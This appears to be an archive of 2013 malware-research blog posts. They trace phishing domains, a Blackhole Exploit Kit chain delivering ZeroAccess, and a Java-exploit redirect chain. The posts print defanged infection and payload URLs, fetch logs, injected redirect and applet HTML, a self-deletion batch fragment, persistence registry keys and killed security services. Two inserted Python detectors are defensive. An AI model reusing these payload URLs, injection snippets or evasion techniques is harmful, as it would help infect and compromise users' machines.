Thursday, 7 February 2013


Influx of PayPal phishes this morning, 30 so far, since 09:53.

So far, whilst the subjects have varied slightly, the href has stayed the same, with all of them leading to:

49paypal.com/73ecc8e60844c7b6e67fa3897b6f134d/01.php

The domain has been registered through Internet.BS, and lives at:

IP: 63.90.228.38
IP PTR: Resolution failed
ASN: 701 63.80.0.0/12 UUNET - MCI Communications

Wednesday, 6 February 2013


Everyone using Facebook will already be seeing the same thing, so nope, not a warning about Facebook Spam.

I actually detest social networking sites; the only reason I've got an account on Facebook is for finding and investigating scams and malware on it.

Since creating the test account, there's been a flurry of spam every single day from Facebook, with the usual "you have more friends than

Tuesday, 5 February 2013

[NEW!] New case: an infection with the same payload type and infection MO on a different domain.
Landing page: 3thtyjtyjcc.ns02.us/closest/209tuj2dsljdglsgjwrigslgkjskga.php
Payload: ZeroAccess
Exploit: Java: #CVE-2010-4476 #CVE-2013-0422, PDF: #CVE-2010-0188, CVE-2009-0927
Sorry, the report is in plain text --> http://pastebin.com/raw.php?i=HPESHngh
I am halfway through a long flight with plenty of spare time, so I checked some queries about malware sites. I received a report to investigate a Blackhole Exploit Kit; the clue was the infected domain 33sdfguuh.mywww.biz. I had no idea where to start, so the first thing I did was query the domain in urlquery, which led me to the suspected landing page URL below:

33sdfguuh.mywww.biz/closest/209tuj2dsljdglsgjwrigslgkjskga.php
I was tempted, so I fetched it:
--2013-02-05 21:45:24--  h00p://33sdfguuh.mywww.biz/closest/209tuj2dsljdglsgjwrigslgkjskga.php
Resolving 33sdfguuh.mywww.biz... seconds 0.00, 89.253.232.149
Caching 33sdfguuh.mywww.biz => 89.253.232.149
Connecting to 33sdfguuh.mywww.biz|89.253.232.149|:80... seconds 0.00, connected.
:
"GET /closest/209tuj2dsljdglsgjwrigslgkjskga.php HTTP/1.0"
Referer: http://malwaremustdie.com
"Host: 33sdfguuh.mywww.biz"
:
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Server: nginx/1.2.6
Date: Tue, 05 Feb 2013 12:45:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.10-1ubuntu3.4
Vary: Accept-Encoding
:
200 OK
Length: unspecified [text/html]
Saving to: "209tuj2dsljdglsgjwrigslgkjskga.php"
"2013-02-05 21:45:27 (90.4 KB/s) - 209tuj2dsljdglsgjwrigslgkjskga.php saved [113594]"
Inside was the common Blackhole v2.x landing page obfuscation, which I manually cracked into the plugin-detect script here -->>[PASTEBIN]. Some highlights:
1. The use of the paired /closest/ directories.
2. Neither the shellcode nor the malware payload download is placed in the landing page; they are scattered across the exploit files instead.
3. Two PDFs, two JARs and one payload.
BHEK is BHEK: by using our guideline -->>[HERE] you can get these samples. FYI, the two PDF URLs are below (this is for people attacked by this Blackhole, who will mostly see these PDF download URLs in their logs):
h00p://33sdfguuh.mywww.biz/closest/209tuj2dsljdglsgjwrigslgkjskga.php?dsmq=30:1n:1i:1i:33&lllsxi=3g:3a:3c&bdm=30:33:1n:1m:1h:33:30:1o:30:1h&uzz=1k:1d:1f:1d:1g:1d:1f
h00p://33sdfguuh.mywww.biz/closest/209tuj2dsljdglsgjwrigslgkjskga.php?qbzntsus=30:1n:1i:1i:33&cazv=39&alltb=30:33:1n:1m:1h:33:30:1o:30:1h&mkitrggt=1k:1d:1f:1d:1g:1d:1f
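As an added example (not from the post), here is a small Python checker for the URL shape quoted above, so that the PDF and payload fetches can be picked out of a proxy log: a long random PHP file name under a short directory such as /closest/, optionally followed by query values built from colon-separated short tokens like 30:1n:1i:1i:33. The log line format and the client addresses are constructed for the demonstration; the matching URLs are the ones from this post. Note that the exploit fetch for the payload percent-encodes a space inside a token, which is why the values are stripped of whitespace before matching.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Shape of the BHEK v2 URLs quoted in the post: one directory (here "/closest/"),
# a long random PHP file name, and query values of colon-separated short tokens.
BHEK_PATH_RE = re.compile(r"^/[A-Za-z0-9_-]+/[A-Za-z0-9]{16,}\.php$")
TOKEN_VALUE_RE = re.compile(r"^[0-9a-z]{1,2}(?::[0-9a-z]{1,2}){3,}$")


def classify_bhek_url(url):
    """Return 'landing', 'exploit-fetch' or None for a single URL."""
    parts = urlsplit(url)
    if not BHEK_PATH_RE.match(parts.path):
        return None
    if not parts.query:
        return "landing"
    # Percent-decoding can introduce spaces ("%20"); drop them before matching.
    values = [v.replace(" ", "")
              for _, v in parse_qsl(parts.query, keep_blank_values=True)]
    if any(TOKEN_VALUE_RE.match(v) for v in values):
        return "exploit-fetch"
    return None


# Constructed proxy log lines (not from the post): "<ts> <client> <method> <url> <status>".
SAMPLE_LOG = """\
2013-02-05T12:45:24Z 10.0.0.7 GET http://33sdfguuh.mywww.biz/closest/209tuj2dsljdglsgjwrigslgkjskga.php 200
2013-02-05T12:45:31Z 10.0.0.7 GET http://33sdfguuh.mywww.biz/closest/209tuj2dsljdglsgjwrigslgkjskga.php?dsmq=30:1n:1i:1i:33&lllsxi=3g:3a:3c 200
2013-02-05T12:46:02Z 10.0.0.9 GET http://www.example.com/blog/wp-login.php?redirect_to=%2Fwp-admin 200
2013-02-05T13:17:33Z 10.0.0.7 GET http://33sdfguuh.mywww.biz/closest/209tuj2dsljdglsgjwrigslgkjskga.php?rjh=30:1n:%201i:1i:33&omtvgame=1i&tdn=trnwuek 200
2013-02-05T13:20:10Z 10.0.0.9 GET http://www.example.com/index.php?id=12 200
"""


def scan_proxy_log(text):
    """Return (client, verdict, url) for every log line whose URL has the BHEK shape."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue
        client, url = fields[1], fields[3]
        verdict = classify_bhek_url(url)
        if verdict:
            hits.append((client, verdict, url))
    return hits


if __name__ == "__main__":
    for client, verdict, url in scan_proxy_log(SAMPLE_LOG):
        print(f"{client} {verdict:14} {url}")
```

Running it lists the landing page visit and both exploit fetches for 10.0.0.7 and nothing for the two ordinary PHP URLs; a hit on the landing page alone is worth a look, a landing page followed by colon-tokenised fetches from the same client is the pattern worth escalating.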
I started with the smallest PDF to find the evil JS code written in the 0x11AF-0x2768 section, shown below. The red mark is the evil script, the purple mark is the long obfuscation var/array, and the yellow mark is the deobfuscator logic. Following the usual method to decode this, we find the infector script, shown in the upper part below; the marked area is the shellcode in text form. The lower part holds the Libtiff overflow CVE-2010-0188 exploit code. *) Note: I marked the part where it checks the Adobe version. In short, the shellcode looks like the below and contains the payload's URL. So I just downloaded it:
GET /closest/209tuj2dsljdglsgjwrigslgkjskga.php?rjh=30:1n:%201i:1i:33&ofa=30:33:1n:1m:1h:33:30:1o:30:1h&omtvgame=1i&tdn=trnwuek&hxx=ynkt HTTP/1.0
Referer: http://malwaremustdie.blogspot.com
User-Agent: Gottcha!
Host: 33sdfguuh.mywww.biz
:
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Server: nginx/1.2.6
Date: Tue, 05 Feb 2013 13:17:33 GMT
Content-Type: application/x-msdownload
Content-Length: 176128
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.4
Pragma: public
Expires: Tue, 05 Feb 2013 13:17:40 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="contacts.exe"
Content-Transfer-Encoding: binary
:
200 OK
Registered socket 1892 for persistent reuse.
Length: 176128 (172K) [application/x-msdownload]
Saving to: `contacts.exe'
2013-02-05 22:17:37 (84.9 KB/s) - `contacts.exe' saved [176128/176128]
Now we have the payload below. *) Note: I marked my PC's local time when I fetched it. Nothing special about the file's looks, and the dull, usual name of contacts.exe.

Debug investigation of the payload

So it's time to debug it to understand it. 1. First, the moronz encrypted the binary, see -->>[HERE]: the .text and .data sections are garbled, and tracing the binary got me stuck at 0x40A209 in the .text section:
0x40A209  add     esi, 1Fh
0x40A20C pushf
0x40A20D or word ptr [esp], 1
0x40A212 nop
0x40A213 popf
0x40A214 wait
0x40A215 push ebp
0x40A216 wait
0x40A217 pop ebp
0x40A218 nop
0x40A219 rep cld
0x40A21B jb loc_40A49D
0x40A221 pop ds
0x40A222 pop ds
0x40A223 cmp dl, bh
0x40A225 push ecx
: (skip)
0x40A229 var_44 = word ptr -6583D684h
0x40A229 var_42 = byte ptr -6583D682h
0x40A229 var_25 = byte ptr -6583D665h
0x40A229 var_23 = byte ptr -6583D663h
: (skip)
0x40A2F9 ; FUNCTION CHUNK AT 0x40A6EF
0x40A2F9 ; FUNCTION CHUNK AT 0x40A839
0x40A2F9 ; FUNCTION CHUNK AT 0x40A874
: (skip)
0x40A2F9 ; FUNCTION CHUNK AT 0x40FC08
0x40A2F9 ; FUNCTION CHUNK AT 0x40FC63
2. Soon, by debugging it, I unravelled some of the mystery and found these clues. This mess loads DLLs using these methods:
LdrLoadDll
LdrGetDllHandle
It uses the below to decrypt:
uncrypted.exe
Microsoft Base Cryptographic Provider v1.0
It detects/searches for the below programs and services:
Windows Defender
wscntfy.exe
MSASCui.exe
MpCmdRun.exe
NisSrv.exe
msseces.exe
fp.exe
:
MsMpSvc
windefend
SharedAccess
iphlpsvc
wscsvc
mpssvc
Debugging further, I found that this malware stops these processes:
MsMpSvc, windefen, SharedAccess, iphlpsvc, wscsvc, mpssvc, bfe
PoC code in ASM here -->>[PASTEBIN]. It also looks to be erasing/throwing something away via the registry:
RECYCLER\
$Recycle.Bin\
With some more registry traces...
InprocServer32
{fbeb8a05-beee-4442-804e-409d6c4515e9}
\registry\machine\Software\Classes\clsid\{5839fca9-774d-42a1-acda-d6a79037f57f}\InprocServer32
:
A nice attempt to save itself under this filename:
TEMP=
\InstallFlashPlayer.exe
Internet access command -1- get GeoIP info and save/get the country code:
GET /app/geoip.js HTTP/1.0
Host: j.maxmind.com
Connection: close
:
geoip_country_code
If you replay this in your browser, you'll get all your GeoIP data plus lat/long coordinates. Internet access command -2- get the counter:
GET /5699017-3C912481A04E584CDF231C519E1DF857/counter.img?theme=%u&digits=10&siteId=%u HTTP/1.1
Host: bigfatcounters.com
User-Agent: Opera/9 (Windows NT %u.%u; %s; %s)
Connection: close
I dumped this data from memory after fetching the last URL above... ↑oh, it is an image file, a counter↓

Behavior Analysis

So what happened when I ran it? See the snapshot below: the execution of CMD for self (copy and) deletion. It sends DNS queries to Google AND to these specific IPs!↓
194.165.17.3:53  ADM-SERVICE-NET (Monaco)
66.85.130.234:53 TechEVE Ltd TE-SAFESUGAR (UK)
Apart from the above HTTP, I detected UDP requests to these IP/port pairs:
92.254.253.254:16464
88.254.253.254:16464
87.254.253.254:16464
71.254.253.254:16464
69.254.253.254:16464
1.172.141.253:16464
122.110.95.253:16464
85.86.69.253:16464
90.230.2.2:16464
115.31.23.2:16464
174.101.87.249:16464
187.74.74.249:16464
61.86.42.249:16464
194.165.17.3:123
91.242.217.247:123
94.183.234.248:16464
180.254.253.254:16464
166.254.253.254:16464
135.254.253.254:16464
134.254.253.254:16464
119.254.253.254:16464
117.254.253.254:16464
115.254.253.254:16464
126.13.87.248:16464
89.215.205.2:16464
222.109.23.4:16464
203.171.244.4:16464
109.90.149.240:16464
173.217.73.3:16464
98.26.183.2:16464
84.55.11.24:16464
116.73.35.4:16464
86.126.1.74:16464
121.242.162.55:16464
175.181.230.42:16464
190.208.75.36:16464
150.214.68.251:16464
188.6.88.61:16464
206.254.253.254:16464
190.254.253.254:16464
182.254.253.254:16464
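The UDP/16464 fan-out above is the most actionable network signal in this post: one host talking to dozens of unrelated addresses on the same high UDP port within minutes. As an added example (not part of the original post), the Python below flags a source host that contacts at least a threshold number of distinct peers on UDP/16464 inside a sliding time window. The flow records are constructed for the demonstration (the peer addresses are reused from the list above, the internal hosts and timestamps are made up), and the threshold and window size are assumed tuning values.

```python
from collections import defaultdict
from datetime import datetime, timedelta

P2P_PORT = 16464                 # ZeroAccess peer port observed in the post
FANOUT_THRESHOLD = 10            # distinct peers before alerting (assumed tuning value)
WINDOW = timedelta(minutes=5)    # sliding window length (assumed tuning value)


def _t(hhmmss):
    """Build a timestamp on the day of the analysis from an HH:MM:SS string."""
    return datetime(2013, 2, 5, *map(int, hhmmss.split(":")))


# Constructed flow records: (timestamp, src, dst, proto, dport). Peer addresses
# come from the post's UDP list; the 10.0.0.x hosts and times are made up.
ZA_PEERS = ["92.254.253.254", "88.254.253.254", "87.254.253.254", "71.254.253.254",
            "69.254.253.254", "1.172.141.253", "122.110.95.253", "85.86.69.253",
            "90.230.2.2", "115.31.23.2", "174.101.87.249", "187.74.74.249"]
SAMPLE_FLOWS = [(_t(f"22:18:{10 + i * 3:02d}"), "10.0.0.7", peer, "udp", P2P_PORT)
                for i, peer in enumerate(ZA_PEERS)]
SAMPLE_FLOWS += [
    (_t("22:18:11"), "10.0.0.7", "194.165.17.3", "udp", 123),    # port-123 traffic also in the post
    (_t("22:19:00"), "10.0.0.9", "90.230.2.2", "udp", P2P_PORT),   # one stray hit: not enough alone
    (_t("22:19:05"), "10.0.0.9", "93.184.216.34", "tcp", 443),
]


def detect_p2p_fanout(flows, port=P2P_PORT, threshold=FANOUT_THRESHOLD, window=WINDOW):
    """Return one alert per source host that reaches `threshold` distinct peers
    on UDP/`port` within any `window`-long span of its flows."""
    by_src = defaultdict(list)
    for ts, src, dst, proto, dport in flows:
        if proto == "udp" and dport == port:
            by_src[src].append((ts, dst))

    alerts = []
    for src, events in by_src.items():
        events.sort()
        start = 0
        peers_in_window = defaultdict(int)   # dst -> number of flows still inside the window
        for ts, dst in events:
            peers_in_window[dst] += 1
            # Slide the window: evict flows older than `window` relative to this one.
            while ts - events[start][0] > window:
                old_dst = events[start][1]
                peers_in_window[old_dst] -= 1
                if peers_in_window[old_dst] == 0:
                    del peers_in_window[old_dst]
                start += 1
            if len(peers_in_window) >= threshold:
                alerts.append({"src": src, "distinct_peers": len(peers_in_window),
                               "first_seen": events[start][0], "last_seen": ts})
                break   # one alert per host is enough for triage
    return alerts


if __name__ == "__main__":
    for a in detect_p2p_fanout(SAMPLE_FLOWS):
        print(f"{a['src']}: {a['distinct_peers']} UDP/{P2P_PORT} peers "
              f"between {a['first_seen']:%H:%M:%S} and {a['last_seen']:%H:%M:%S}")
```

The same loop works over NetFlow or firewall export once the five fields are extracted; the window matters because a legitimate P2P client also fans out, but rarely to a fixed port with this density right after a new executable appears on the host.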
A short session of infection goes like this: And these are the snapshots of the UDP, malformed DNS requests I was talking about. It sent malformed DNS requests like this: Any idea what this is, friends? :-) Furthermore, let's look at the file, process, networking and registry activity -->>[HERE]. This is the full run log of one infection session I made on my PC :-) Please try grepping for values like "RegSet", "CreateFile" or "UDP" to focus on understanding how this malware works. In the registry there are changes in:
HKLM\Software\Classes\ClsId\{...some ID....}\InprocServer32\
--→"C:\WINDOWS\system32\wbem\fastprox.dll"/"C:\RECYCLER\S-1-5-18\$6576a1a85f9fdb0e20568660563a58ee\n."
↑Wow, this looks like a setup for deletion... Noticing the above, I realized that the registry keys below had been deleted:
..\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy
..\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile
..\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications
..\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List
..\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile
..\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications
..\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
..\System\CurrentControlSet\Services\SharedAccess\Setup
..\System\CurrentControlSet\Services\SharedAccess\Setup\InterfacesUnfirewalledAtUpdate
..\System\CurrentControlSet\Services\wscsvc
..\System\CurrentControlSet\Services\wscsvc\Enum
..\System\CurrentControlSet\Services\wscsvc\Parameters
..\System\CurrentControlSet\Services\wscsvc\Security
Now I know why it searched for those program strings during debugging: to DELETE them. Moreover, I saw a failed attempt to start the Active Directory Domain Services Database Mounting Tool, or SERVICES_ACTIVE_DATABASE, binding to localhost...

What's this mess?

So what malware are we dealing with, then? 1) A trojan (for sure, given the whole infection MO and the erasing of stuff) plus a started service, but for what? I wonder what would have happened if one of those requests had been successfully established. IF it sent data, then we have 2) spyware with these characteristics. Researching further, the way it changed the Recycler keys/values in the registry led me to the good write-up about the ZeroAccess Recycler version here -->>[TigzyBlog]. And UDP/16464 identifies it as the ZeroAccess (alias MaxPlus, Sirefef) variant. Thanks to Tigzy-RK for a useful write-up -->Tigzy-RK. And for all the advice I received, I thank you.

Samples

Here are the overall samples -->>[HERE] (samples are shared for raising the detection ratio and for research purposes). *) Thank you to @Horgh_rce for adding the unpacked version of the malware. It's really good to know that I didn't miss a thing during debugging.

Virus Total

Below is the detection ratio at the moment the samples were checked in VT:
Landing page: (1/46) -->>[VT]
PDF1: (20/46) -->>[VT]
PDF2: (13/46) -->>[VT]
JAR1: (6/46) -->>[VT]
JAR2: (5/46) -->>[VT]
Payload: (6/46) -->>[VT]

The Infection

I don't have time to check all of these, but all of these BHEK instances are infecting the same ZeroAccess variant now. Marked are the domain name and the BHEK "/closest" path: The PoC of the list in the picture above is --->>[HERE] and here -->>[HERE]

Thank you for your help, advice & cooperation!

#MalwareMustDie!
No idea why yet, but the hpHosts server went down (and is still down at the time of writing) around an hour or two ago.

Will post an update as soon as I know more.

/edit

As timely as always, it came back up around 5 mins after I posted this. Still trying to find out what is going on.

Monday, 4 February 2013


It's Internet Safety Day today, folks, and the BBC have a "Share Take Care" campaign going to help educate the public on, well, safety online.

A lot of people, young and old, share a raft of personal information about themselves, on social networking sites for example, without realizing the risks of doing so. Whilst unlikely to ever stop, it's time to take a more active role in helping to

Sunday, 3 February 2013

Infection route:
Infector:    h00p://tropold.org/jerk.cgi?6
Redirector: h00p://painterinvoice.ru/1yM1hP12juZ0eb1m08qSE0gC6f01z5B0c4Vm12yDo0Xvu50mkZ10gv2o0FwTJ0kT3S0y2Lp0cz4L0JlPp0fzIh0oYGU0XFea/
Downloader1: h00p://painterinvoice.ru/ISRonx04zR50Jrd217..vN607Atz/getmyfile.exe?o=1&h=11
Lead to: (same path)/imJTuXe.jar
Downloader2: h00p://painterinvoice.ru/3vzJEf0i1Ke0TEJU0NH..0mMLQ/getmyfile.exe?o=1&h=12
Payload: h00p://fuji-solar.co.jp/date/dune.exe
Infector hosts:
Infector (hacked site): tropold.org (209.8.45.242)
Landing page: painterinvoice.ru (108.61.12.43)
Payload (hacked site): fuji-solar.co.jp (60.43.201.33)

PoC:

Infector:
// download

--2013-02-03 02:22:15-- h00p://tropold.org/jerk.cgi?6
Resolving tropold.org... seconds 0.00, 209.8.45.242
Caching tropold.org => 209.8.45.242
Connecting to tropold.org|209.8.45.242|:80... seconds 0.00, connected.
:
GET /jerk.cgi?6 HTTP/1.0
Referer: http://malwaremustdie.blogspot.jp/
User-Agent: We are MalwareMustDie! You are on our blog!
Host: tropold.org
:
HTTP/1.1 200 OK
Date: Sat, 02 Feb 2013 19:03:31 GMT
Server: Apache
Set-Cookie: thlpg6=_1_; expires=Sun, 03-Feb-2013 19:03:31 GMT; path=/; domain=tr
opold.org
Connection: close
Content-Type: text/html; charset=UTF-8
:
200 OK
Length: unspecified [text/html]
Saving to: `jerk.cgi@6.1"
2013-02-03 02:22:15 (1.49 MB/s) - `jerk.cgi@6.1' saved [182]"

// cat

<html><frameset rows="100%">
<frame src="h00p://painterinvoice.ru/...U0XFea">
</frameset>
</html>
Redirectors:
// download

--2013-02-03 02:23:29-- h00p://painterinvoice.ru/1yM1hP12juZ0eb1m08qSE0gC6f01z5
B0c4Vm12yDo0Xvu50mkZ10gv2o0FwTJ0kT3S0y2Lp0cz4L0JlPp0fzIh0oYGU0XFea
Resolving painterinvoice.ru... seconds 0.00, 108.61.12.43
Caching painterinvoice.ru => 108.61.12.43
Connecting to painterinvoice.ru|108.61.12.43|:80... seconds 0.00, connected.
:
GET /1yM1hP12juZ0eb1m08qSE0gC6f01z5B0c4Vm12yDo0Xvu50mkZ10gv2o0FwTJ0kT3S0y2Lp0cz4L0JlPp0fzIh0oYGU0XFea HTTP/1.0
Referer: http://malwaremustdie.blogspot.jp/
User-Agent: We are MalwareMustDie! You are on our blog!
Host: painterinvoice.ru
HTTP request sent, awaiting response...
:
HTTP/1.0 302 Found
Set-Cookie: PHPSESSID=2pt94m2itjr49i320maohs0r30; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Powered-By: Application Error....
Server: QRATOR
Location: h00p://painterinvoice.ru/..0fzIh0oYGU0XFea/
Content-type: text/html
Content-Length: 0
Connection: keep-alive
Date: Sat, 02 Feb 2013 17:27:06 GMT
:
302 Found
:
Location: h00p://painterinvoice.ru/1yM1hP12ju..zIh0oYGU0XFea/ [following]
Skipping 0 bytes of body: [] done.
--2013-02-03 02:23:30-- h00p://painterinvoice.ru/1yM1hP12juZ0eb1m08q...2Lp0cz4L0JlPp0fzIh0oYGU0XFea/
Reusing existing connection to painterinvoice.ru:80.
:
GET /1yM1hP12juZ0eb1m08qSE0gC6f01z5B0c4Vm12yDo0Xvu50mkZ10gv2o0FwTJ0kT3S0y2Lp0cz4L0JlPp0fzIh0oYGU0XFea/ HTTP/1.0
Referer: http://malwaremustdie.blogspot.jp/
User-Agent: We are MalwareMustDie! You are on our blog!
Host: painterinvoice.ru
:
HTTP/1.0 200 OK
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Powered-By: Application Error....
Server: QRATOR
Content-Type: text/html
X-Mode: HTML
Content-Length: 490
Connection: keep-alive
Date: Sat, 02 Feb 2013 17:27:07 GMT
:
200 OK
Length: 490 [text/html]
Saving to: `index.html"
2013-02-03 02:23:31 (13.4 MB/s) - `index.html saved [490/490]"

// cat

<html>
<head>
<title>TTklldd</title>
</head>
<body>
<applet archive="imJTuXe.jar" code="kobCA.Qbyka" name="vNOArj">
<param name="p" value="h00p://painterinvoice.ru/ISRonx04...607Atz/getmyfile.exe?o=1&h=11"/>
</applet>
<script type="text/javascript" src="rtoplsf.js"></script>
</body>
</html>

Downloader:

↑See ISRonx04...607Atz/getmyfile.exe?o=1&h=11: this is the downloader scheme of this exploit kit. It forwards you to the JAR download URL:
h00p://painterinvoice・ru/spM4XE0q6I0074Rr0gZq70QF520sJWu0pqgQ0QET4131rg0YCPL07RJk0ePNF0VV9X0313c0JKqP0Kx3Z0l4D00nDue0ujSn/imJTuXe.jar
Download...
--2013-02-03 02:26:40--  h00p://painterinvoice.ru/spM4XE..ujSn/imJTuXe.jar
Resolving painterinvoice.ru... seconds 0.00, 108.61.12.43
Caching painterinvoice.ru => 108.61.12.43
Connecting to painterinvoice.ru|108.61.12.43|:80... seconds 0.00, connected.
:
GET /spM4XE0q6I0074Rr0gZq70QF520sJWu0pqgQ0QET4131rg0YCPL07RJk0ePNF0VV9X0313c0JKqP0Kx3Z0l4D00nDue0ujSn/imJTuXe.jar HTTP/1.0
Referer: http://malwaremustdie.blogspot.jp/
User-Agent: We are MalwareMustDie! You are on our blog!
Host: painterinvoice.ru
HTTP request sent, awaiting response...
:
HTTP/1.0 200 OK
Set-Cookie: PHPSESSID=d8l9gc7g9vbg0poai41h97r7c6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Powered-By: Application Error....
Server: QRATOR
Content-Type: text/html
X-Mode: HTML
Connection: close
Date: Sat, 02 Feb 2013 17:30:16 GMT
:
200 OK
Length: unspecified [text/html]
Saving to: `imJTuXe.jar"
2013-02-03 02:26:41 (14.5 KB/s) - `imJTuXe.jar saved [12996]"

Exploitation

The target privilege: The flood: CVE-2012-1723, CVE-2012-4681. This JAR at VirusTotal, URL -->>[HERE]
SHA256: ca601ec85cc7bc2afa82384a1b832401af281e476021b1db59201bb8d0936211
SHA1: e3f1b938ef96c139b948c6bd9cc69d7c2dec0643
MD5: 9c4ca2083a2c4cd518897ab59df3a15c
File size: 12.7 KB (12996 bytes)
File name: imJTuXe.jar
File type: JAR
Tags: exploit jar cve-2012-1723 cve-2012-4681
Detection ratio: 10 / 46
Analysis date: 2013-02-03 08:07:39 UTC (2 hours, 36 minutes ago)
Malware names:
DrWeb : Exploit.CVE2012-1723.13
GData : Java:CVE-2012-1723-VT
AntiVir : EXP/2012-1723.GE
TrendMicro : HEUR_JAVA.EXEC
McAfee-GW-Edition : Exploit-CVE2012-1723.c
Avast : Java:CVE-2012-1723-VT [Expl]
ESET-NOD32 : probably a variant of Java/Exploit.CVE-2012-1723.FR
McAfee : Exploit-CVE2012-1723.c
Ikarus : Java.CVE.2012
Sophos : Troj/JavaDl-NZ
The JAR resulted in the below URL:
h00p://painterinvoice.ru/3vzJE..(long)..0mMLQ/getmyfile.exe?o=1&h=12

Payload:

Again we met the "..0mMLQ/getmyfile.exe" downloader, which now points to the payload URL below:
h00p://fuji-solar.co.jp/date/dune.exe
It's still up there (consider this the necessary warning...). Download log:
GET /date/dune.exe HTTP/1.0
User-Agent: MalwareMustDie! You are famous now!
Host: fuji-solar.co.jp
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Date: Sat, 02 Feb 2013 17:20:04 GMT
Server: Rapidsite/Apa
Last-Modified: Sat, 02 Feb 2013 12:26:52 GMT
ETag: "35dd625-37400-510d060c"
Accept-Ranges: bytes
Content-Length: 226304
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/exe
:
200 OK
Registered socket 1896 for persistent reuse.
Length: 226304 (221K) [application/exe]
"Saving to: `dune.exe"
Payload at VirusTotal, URL is here -->>[HERE]
SHA256: 0e61ecd0aad87a72d36bc10288303292859a800d2237ac9c32755d9e455e87e2
SHA1: a7344edd33d4bcd538fdba240c2996417a0d63b8
MD5: a26ff2a7664aaa03d41a591fc71d2221
File size: 221.0 KB (226304 bytes)
File name: dune.exe
File type: Win32 EXE
Tags: peexe
Detection ratio: 3 / 46
Analysis date: 2013-02-03 07:09:05 UTC (38 minutes ago)
Malware Name:
TrendMicro-HouseCall : TROJ_GEN.F47V0202
DrWeb : Trojan.KillProc.22029
Symantec : WS.Reputation.1
↑Low detection. It looks like we will see many infections happen. I wrote a quick analysis of this malware in a VT comment, with additional information below. As I wrote in the VT comment, this malware killed explorer.exe and started a new one, as I reproduced below. How did this malware do it, and what for? The below could be the answer. First, it creates 1958718(RANDOM).bat in the current directory. PoC traces:
"WriteFile","C:\Documents and Settings\%USER%\%DESKTOP%\1958718.bat",
"SUCCESS","Offset: 0, Length: 72"
And executes it with a CMD command to re-run explorer and delete the malware files:
"Process Create","C:\WINDOWS\system32\cmd.exe","SUCCESS","PID: 2916, 
Command line:
cmd /c """"C:\Documents and Settings\%USER%\%DESKTOP%\1958718.bat""
With the batch command below:
(361): /sd %lu
(363): %lu.bat "
(364): attrib -r -s -h %%1
(365): del %%1
(366): if exist %%1 goto %u
(367): del %%0
(369): %s\explorer.exe"
This act hides the real malware activity and deletes the malware files from the PC after execution. What happened while explorer.exe was terminated: it created C:\WINDOWS\system32\fastinit.exe(RANDOM) (a self-copy) and made it autostart in the registry by setting these key/values:
"CreateFile","C:\WINDOWS\system32\fastinit.exe","SUCCESS", OpenResult: Created"
"RegSetValue","HKCU\Software\Microsoft\Windows\CurrentVersion\Run\helplist(RANDOM)","SUCCESS","
Type: REG_SZ, Length: 66, Data: C:\WINDOWS\system32\fastinit.exe"
NOTE: The malware chose the name for its self-copy AFTER checking which EXE files actually exist on your PC, and picked one of them as the target name to copy to, PoC -->>[HERE]. Furthermore, randomization is also used to pick the autostart registry key name: in this case it was Windows\CurrentVersion\Run\helplist, while in VT I detected \Windows\CurrentVersion\Run\autocnfg, and the VT behaviour test itself shows \Windows\CurrentVersion\Run\blassmgr. The rest of the registry changes are as below:
"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\helplist","SUCCESS","Type: REG_SZ, Length: 66, Data: C:\WINDOWS\system32\fastinit.exe"
"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Personal","SUCCESS","Type: REG_SZ, Length: 86, Data: C:\Documents and Settings\%USER%\My Documents"
"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache","SUCCESS","Type: REG_SZ, Length: 140, Data: C:\Documents and Settings\%USER%\Local Settings\Temporary Internet Files"
"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{11948642-10a9-11e2-95b6-806d6172696f}\BaseClass","SUCCESS","Type: REG_SZ, Length: 12, Data: Drive"
"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{903f3d4c-6ae4-11e2-91fb-0012f0e93e3e}\BaseClass","SUCCESS","Type: REG_SZ, Length: 12, Data: Drive"
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Common Documents","SUCCESS","Type: REG_SZ, Length: 92, Data: C:\Documents and Settings\All Users\Documents"
"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Desktop","SUCCESS","Type: REG_SZ, Length: 74, Data: C:\Documents and Settings\%USER%\%DESKTOP%"
"HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass","SUCCESS","Type: REG_DWORD, Length: 4, Data: 1"
"HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName","SUCCESS","Type: REG_DWORD, Length: 4, Data: 1"
